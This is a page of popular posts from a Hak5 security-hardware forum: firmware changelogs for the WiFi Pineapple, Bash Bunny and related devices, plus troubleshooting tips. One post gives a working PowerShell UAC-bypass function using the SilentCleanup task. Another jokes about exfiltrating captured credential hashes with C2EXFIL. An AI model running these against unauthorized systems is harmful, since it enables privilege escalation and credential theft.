Popular Content

Showing content with the highest reputation since 12/12/2018 in Posts

  1. 7 points
    Hi everyone, We just released firmware version 2.5.x for the WiFi Pineapple, vastly improving the PineAP engine. Expect greater results on your next wireless engagement with this release.

    Changelog 2.5.4:
    Recon
    - Fixed an issue where scan times would be invalid in non-Chromium web browsers.

    Changelog 2.5.3:
    Clients
    - Fixed an issue where SSIDs would not populate.
    Filters
    - Add detailed Filters information.
    Setup
    - Choosing the Filter modes is now required upon Setup.
    Recon
    - Fixed an issue where, in some cases, probes would not be shown in the Recon dialog.
    - Fixed an issue where some probes were not logged during a Recon scan.
    - Fixed an issue where, in some cases, handshakes would not be captured.
    - Fixed an issue where captured handshakes could not be downloaded if the capture had stopped.
    - Fixed an issue where, in some cases, captured handshakes would have invalid frame lengths.
    - Previous scan dates are now translated to the browser's local time.
    - Fixed a rare issue where Live Scan results would not populate in the Web UI.
    PineAP
    - Fixed an issue where downloading captured handshakes would not work.

    Changelog 2.5.2:
    Recon
    - Fixed an issue where invalid results with BSSID 00:00:00:00:00:00 would be collected.
    - Fixed an issue where changing the band to scan would not update until PineAP was restarted.
    - Fixed a firewall issue preventing Live Recon results from populating in the Web UI.

    Changelog 2.5.1:
    Misc
    - Fix an issue where "Unsupported Device" would incorrectly show.

    Changelog 2.5.0:
    Hak5 Cloud C2
    - Client Update
    PineAP
    - Rewrite of PineAP, featuring a multitude of improvements and reliability fixes.
    Recon
    - Improved reliability of scanning.
    - Add throbber for deauth button.
    - Automatically start scan after enabling PineAP.
    - Remove misleading information message when the user started their first scan.
    - Fixed a rare issue where multiple live Recon processes would start.
    Misc
    - Reduce amount of Web UI HTTP requests.
    - Fix missing paths on the WiFi Pineapple NANO.

    Download: Over the air via your WiFi Pineapple's web interface, or at https://downloads.hak5.org. ♥ - The Hak5 Development Team
  2. 3 points
    Hello! We're happy to introduce the 1.0.1 update for the Signal Owl. It introduces some bug fixes and changes on entering Arming Mode to improve the user experience.

    1.0.1 Change Log:
    General
    - Simplified device mode selection. The device now starts in ATTACK mode by default. Enter ARMING mode by pressing the device button at any time while in ATTACK mode.
    - Fixed a bug in USB Storage Mounting, which sometimes would cause payloads and firmware upgrades to fail.
    - Fixed a bug in the LED helper, which would sometimes prevent payloads from updating the LED.
    - Fixed a network device driver bug and interface misconfiguration caused by some external wireless adapters.
    - Fixed a bug in the device reset button, which made it difficult to perform factory resets.

    You can grab the update via the Hak5 Download Center and follow the Hak5 Docs Signal Owl Update article to get on the latest version. Cheers, Marc
  3. 3 points
    Hi all - I understand the desire to use the infusions from the WiFi Pineapple Mark V era. As Seb has previously pointed out, unfortunately the older devices are no longer capable of securely downloading these infusions over the air from our infrastructure. That being said, all of the modules/infusions may be manually installed to either local or SD storage with ease. To that effect I have published the following article on docs.hak5.org - https://docs.hak5.org/hc/en-us/articles/360023458173 Happy hacking!
  4. 3 points
    Good luck with that. We're not going to help you hack your girlfriend's iPhone.
  5. 3 points
    function sudo {
        $command = "powershell -noexit " + $args + ";#"
        Set-ItemProperty -Path "HKCU:\Environment" -Name "windir" -Value $command
        schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
        Remove-ItemProperty -Path "HKCU:\Environment" -Name "windir"
    }

    Quick function that works like sudo 🙂
  6. 3 points
    It would be awesome if I could manage my wifi pineapples modules/payloads from cloud C2. Obviously this would be true of the other supported devices as well.
  7. 2 points
    Hi all - We're excited to introduce a new bit of kit to the Hak5 arsenal – the Plunder Bug! It's a smart LAN Tap with a new take on Packet Sniffing! This is a bit of kit I've been wanting for myself for quite a long time, as I've never been satisfied with the traditional RJ45 Ethernet-based LAN Taps, and if we were going to make one we'd make it special with the ability to act as not just a tap but a mini-switch and a USB Ethernet adapter all in one. It's sweet and simple with the convenience of USB-C and a very small form-factor while sporting some features you won't find in your typical LAN Taps – like the integrated USB Ethernet adapter (yay, no more mess of cables and dongles!), the ability to make passive captures or active scans (acting sort of like an unmanaged switch), and a companion Android root app that makes it possible to capture packets right from your phone!

    You can find the device for sale now at https://shop.hak5.org/products/bug
    The documentation can be found at https://docs.hak5.org/hc/en-us/categories/360001482953-Plunder-Bug
    And the connection scripts are available in the Hak5 Download Center at https://downloads.hak5.org/ and on our Github at https://github.com/hak5/plunderbug-scripts

    As for the tech, we've packed in a 10/100 Base-T Fast Ethernet switch with the mirrored traffic heading to the integrated USB Ethernet adapter (ASIX AX88772C chipset) and the whole thing is powered over USB-C with a very low draw around 200-300 mA. INB4 it's compatible with gigabit links in that it'll drop 'em to 100 Mbit. I'll post a video here shortly – stay tuned! Huge props to the ever growing Hak5 dev team and their awesome work putting together these scripts and the killer Android app (more on that soon) and as always thanks again to you guys for being the awesome Hak5 community that you are, for your feedback and contributions and making this place somewhere all hackers belong 🙂
  8. 2 points
    I'm not trying to be vague. I simply don't want to be held responsible for people bricking their devices. Download/transfer the IPK-file from my repo to your Pineapple. SSH/SCP/wget, whatever works best for you. SSH to the Pineapple and run the command below within the same directory you downloaded/transferred the file to.

    opkg update ; opkg install sslsplit_0.5.5-1_mips_24kc.ipk -d sd

    There are no prerequisites, except having an active internet connection on the Pineapple while installing. This is not a part of the official module which you can download on the Pineapple, but you should be able to use the module with this package. When I get time, I'll create a fork of the official Module, so that people not experienced with this stuff can use it to set up everything via the Module GUI.
  9. 2 points
    I'm keeping an eye on things. Already had one warning, any more and gone.
  10. 2 points
    There's ~23 MB free on the root file system and another ~30 MB available in /tmp.

    Cocktail napkin math says with 14 byte hashes you're looking at being able to store some 1.6 million creds, give or take...

    And of course there's always C2CONNECT && C2EXFIL /tmp/logfile # :)
  11. 2 points
    Hi everyone, We're very happy to announce the release of the 1.6 Firmware for the Bash Bunny. This firmware packs a few new features and bug fixes, as well as support for the Metasploit tools package.

    Change Log:
    - Fix an issue where APT would not work correctly due to now invalid feeds.
    - Add the Debian Stretch APT feeds.
    - Include Ruby 2.3.3 by default.
    - Update Bunny Extensions to the latest available via GitHub.
    - Include languages for BE, BR, CA-FR, CA, CH, CZ, DE, DK, ES-LA, ES, FI, FR, GB, HR, IT, MX, NO, PT, SE, SI and SK.
    - Add support for the Metasploit Framework tool.
    - Add ATTACKMODE ARMING.

    You can also find the new Metasploit tools package on the tools forum post. You can update your Bash Bunny to version 1.6 by using the Bash Bunny Updater. Thank you to everyone who tried out the beta test! We're looking forward to seeing feedback from the community :) Cheers, Foxtrot
  12. 2 points
    Please give some context to this or I'll lock it as being too vague and looking a lot like spam.
  13. 2 points
  14. 2 points
    Yes, it's normal, the red flashing LED is indicating wlan1 is in monitor mode. So it will stop flashing when you take wlan1mon out of monitor mode.
  15. 2 points
    The tinfoil is strong with this one.
  16. 2 points
    The BashBunny can do USB-HID (keyboard), USB-serial and USB-ethernet, the packet squirrel can only do network-related attacks. Furthermore, the BashBunny has more local storage, more RAM and more computational power. You should think of the Packet Squirrel more like a LAN Turtle except for being inline ethernet.
  17. 1 point
    If you are using the wall adapter and having these issues I would try a firmware recovery then update. This can be caused by too little power supplied to the pineapple but seeing that you are using the wall adapter I would tend to look at firmware. If that does nothing I would take a look that the wall adapter is not going bad as well.
  18. 1 point
    You clone it to /sd/modules, AND create a sym-link (shortcut) to "/pineapple/modules/sslsplitdirectory". This will make the module appear in the web interface. This sym-link process is mentioned in the instructions and the tutorial. Don't use the exact directory name I wrote above. 🙂
  19. 1 point
    Data recovery. Maybe somebody can share opinion and experience on recovering deleted data. I hope to successfully clone the cell phone and open it on virtualbox or another emulator. My understanding of data recovery in layman's terms: the file is deleted but in the background it's simply a piece of free space now ready to be rewritten or overwritten. When trying to recover data it's best to shut the machine down when the removal or deletion was done, as soon as possible; if the machine is powered off it will prevent overwriting of this data space stored on the hard drive. If I DD clone the HD, I assume I can recover any data left untouched with an emulator and an exact clone of the cell phone HD partition... I should also be able to boot up this clone.... Any advice? Am I wrong? I don't want to mislead future visitors of this thread.
  20. 1 point
    Any computer will do good for cyber security, it is all about software. A good rule of thumb is:
    - RAM: 4Gb
    - Graphics: Pretty much anything (it doesn't have to be able to run crisis 3)
    - CPU: 2-4 cores (2-3 GHz)
    - Hard drive: Pretty much any SSD will do
    If you want a desktop you can just order an old desktop and upgrade the RAM if needed. If you want a laptop you should watch this video. Edit: Don't forget stickers
  21. 1 point
    Save your time effort and money..........a friend of mine paid for the training and it never arrived.......lots of 'Wait a short while' messages........finally they got the money back. Nothing but agro..........AVOID............you don't need it, you really don't.........Hope this helps.......😈
  22. 1 point
    Hello there, I was thinking about putting my wifi pineapple in my backpack and using it on the go. However two antennas always look out of the bag and that's kinda stupid and gets me unwanted attention. My question now is if it is possible to remove 2 of the antennas and use the wifi pineapple with the other two remaining ones so they don't stick out. I know that for some routers you have to leave the antennas connected because otherwise it damages the device but maybe it's different for the wifi pineapple? If not I'll probably end up buying a WiFi pineapple nano.
  23. 1 point
    Of course I meant Rogue. I just mistyped, but obviously you knew what I meant. So have you got any constructive advice?
  24. 1 point
    There's been a bug in mdk4 related to some of the arguments you're providing to mdk4. I updated the tool yesterday, which should fix any issues with it. https://github.com/adde88/openwrt-useful-tools
  25. 1 point
    Any chance Hak5 will do a series on how to detect/spot attacks? Something maybe for the home user? Or does anyone know of a channel that is already doing this, at the same level as Hak5? Many thanks.
  26. 1 point
    What power source is being used? It is very important that adequate power is supplied to the pineapple. The reason I ask is back when the Mark V was mainstream it was a common issue of power sources being used that were not sufficient, causing several problems including boot loops on startup. It needs at least a 1 amp source but it is recommended to use higher, possibly a 2 amp supply.
  27. 1 point
    I use Proxmox VE, works great - supports SPICE and USB passthrough. https://www.proxmox.com/en/proxmox-ve
  28. 1 point
    True. Something like this should work if all you need is power for the tetra: https://www.amazon.com/Gigabit-Splitter-Adapter-802-3at-compliant/dp/B00NH8QSOY
  29. 1 point
    Great response......... It depends on what hat you are wearing.......my hat is white......I can understand that it could be used for illegal activity, but us (legit) 'good guys' see it as a must for our work and obviously our clients. You can use a transmitter and monitor the emergency services, but if you attend a scene and are caught transmitting the information you could be charged. However, that would depend on which country you were in and the laws associated to that place. In essence, use the item legitimately and prove that you were employed to do so (unless you are doing it for/on your own devices/systems) and you should be fine (IMO). Hope this adds to digininja's helpful comments😎
  30. 1 point
    Hey WPA2, I agree that it can stretch the budget, but it depends on why you want it? If it is to be added to your arsenal as part of your business, then I am sure you can recoup the expenditures. If, on the other hand, it is because you want one rather than need one, well, that is a decision that relies on available finances. For me, it is the former, but having tried edutech on several occasions and no joy (not even for a ducky), it is hard to see where else other than HAK5 shop, you can get one from. Sometimes, just sometimes, they do sneak onto ebay or even Amazon, if that helps you at all😎
  31. 1 point
    This is a topic for the Pineapple thread. It has been answered multiple times already.
  32. 1 point
    Love the device, very cool. BUT shipping to the UK not so good.
  33. 1 point
    They’re probably smarter than you for using an old flip phone. This is one of those ‘If you have to ask, the answer is no.’ type questions. edit: Shit, they’re probably smarter than all of us for using a flip phone.
  34. 1 point
    Yes, it can break things. Sounds like you don't know what the tool does otherwise this would be fairly obvious. Do your research, read what it does and how it works and you should be able to answer your own question.
  35. 1 point
    You're flashing the wrong firmware via the Firmware Recovery mechanism. You need to get the special factory.bin firmware from https://downloads.hak5.org and then follow the instructions at https://docs.hak5.org/hc/en-us/articles/360010471774-Firmware-Recovery.
  36. 1 point
    Update: hey d137 I was exploring my Bunny and decided to follow the steps to give it access to the internet (with ATTACKMODE RNDIS_ETHERNET SERIAL). While I was running that payload I sshed into the OS and mounted the udisk and checked the tools folder; at some point the tools had installed and when I tried QuickCreds it ran without a failure. Hope this helps you as well.
  37. 1 point
    Yeah, "here's an executable you run it." is not a great approach. I have seen a "killswitch" in action deployed en masse. You want to hook the .dll (possibly even replace the Windows version of the .dll). By grabbing it at the OS level there is a less noticeable action/reaction to the plugging in of USB devices. If the machine just turns off the port/device then mitigation has occurred. Have Windows log the time, users logged into the machine and other details for automated reporting. The "attacker," who could be a disgruntled employee, will think the machine is locked down, or even that his attack was successfully silent.
  38. 1 point
    I think I am onto something.. I have Japanese characters in my wifi names. Maaaybe it just doesn't like to connect to these. Tried to connect to the pineapples own open network and that worked fine with the wlan2 module. Will get around to changing the name today and post any progress.
  39. 1 point
    Teaching the ethics behind cybersecurity is important. If students are going to abuse the device, especially against other students then it would make sense to restrict access to anyone caught abusing the device. While also encouraging the general student body to utilize services such as vpn, perhaps the university can provide a free vpn option for students and faculty. With that said, there are a myriad of legal and cool things that a pineapple can do that are not disruptive. That of course should be the academic focus. Some encouragement through things like hack-a-thons could even improve overall network security. Like a competition to establish a low cost vpn solution for the school. Wifi Nano is a great platform to begin development because it is a type of development environment too. Positives seem to outweigh negatives. Although a pineapple is a threat, an advanced user could easily create such attacks with their own hardware. Why would they need a pineapple, if they are that advanced; they probably know that...
  40. 1 point
    https://nordvpn.com/blog/article-13-nordvpn-meme-contest/ So as you all may or may not know the EU is going to ban memes because of copyright infringements. Obviously that's absolute bs because I think memes are a great part of the internet and a neat way to express yourself. Anyway if you love memes and cybersecurity then I would suggest checking out this contest on reddit for a chance to get a free vpn subscription.
  41. 1 point
    Your best option for help would be the discord channel. The forum is slow yes, but things do get answered eventually
  42. 1 point
    So, I am working on an Intro to Golang workshop for my local hackerspace when I remembered I wanted to try something. I looked up the specs for the BB and saw it uses an ARM processor and runs Linux. Same as my Pis that I cross compile Go code for all the time. Time to try something. So, I made a simple hello world and compiled it for arm5. scped it over to the BB and ssh into it and ran it and there was my hello world. I then made an HTTP server that, when I send a GET request, I get hello world back. It worked. All is working so if you want to mess around and start using Golang for your payloads, the command to compile to the correct architecture for the BB is below. Remember if you want to publish your payload here, it cannot be compiled so you will have to publish the source for others to compile themselves.

    env GOOS=linux GOARCH=arm GOARM=5 go build
  43. 1 point
    Still want to know which income to generate with an empty server ... Would start some easily
  44. 1 point
  45. 1 point
  46. 1 point
    No. https://wiki.archlinux.org/index.php/Software_RAID_and_LVM#RAID_installation
  47. 1 point
    I made a POC of a remote shell for windows accessible via TOR hidden services. This could easily be made into a BashBunny payload. See my project description here: https://www.cron.dk/under-the-radar-remote-shell/ Comments are welcome.
  48. 1 point
    Same issue, I saw the tetra, but without IP ... But it seems that you got "no answer" to your question. Did you find a solution via USB?
  49. 1 point
    Try the masquerading with your iptables. You might can just masquerade with no interface and it will work like you do with sharing INet with Pineapple and BB through *Nix systems.

    iptables -A POSTROUTING -t nat -j MASQUERADE

    I know if I share inet with my pi Zero W I do not need to directly add a iptable to either the pi nor the host machine to nat traffic specifically from one to the other to share inet. I just need to make sure ip forwarding is enabled on the host machine, a default route is present or routes for subnets I want to forward to and masquerading for the nat table is set on the host. Default gateway needs to be on the Pi also pointing to the IP of the host it is connected to. So, I am turning my host machine into a router for the pi. So, you need the ping to look like it came from the PS with masquerade. Without it, I believe it sees it is from that IP of the machine which the machines on the network do not know where that is since their gateway is the router for the network, not the PS that contains the route. This also means you need to be running in a mode that the PS gets its own IP too.
  50. 1 point
    Thanks very much for the explanation. Saved me several more hours of frustration... Bunny Flashed and displaying RED flashing LED so success I think. Much appreciated. MM